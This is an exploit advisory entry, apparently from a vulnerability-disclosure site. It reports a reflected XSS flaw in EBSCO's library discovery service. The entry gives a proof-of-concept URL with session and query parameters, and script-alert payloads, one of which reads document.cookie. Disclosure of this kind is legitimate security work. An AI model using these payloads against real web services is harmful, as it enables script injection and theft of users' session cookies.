EBSCO University Library System Reflected XSS

2018.04.02
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: [Reflected XSS at EBSCO University Library System] # Date: [01.04.2018] # Exploit Author: [Ismail Tasdelen] # Vendor Homepage: [https://www.ebsco.com/] # Software Link: [ EBSCO University Library System ] # Version: Last Version # Risk : Medium # POC: Url address : http://eds.b.ebscohost.com/eds/results?vid=1 Reflected XSS Payload : <script>alert('Ismail Tasdelen')</script> <script>alert(document.domain)</script> <script>alert(document.cookie)</script> Query String Parametres : vid: 1 sid: 7074b067-d86d-4482-8e47-05f7cce84f6d@pdc-v-sessmgr01 bquery: XX "ismail"[100] AND (XX "script"[92] OR XX "alert"[87]) bdata: JmNsaTA9RlQxJmNsdjA9WSZsYW5nPXRyJnR5cGU9MCZzaXRlPWVkcy1saXZl # You want to follow my activity ? https://www.linkedin.com/in/ismailtasdelen https://github.com/ismailtasdelen

References:

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top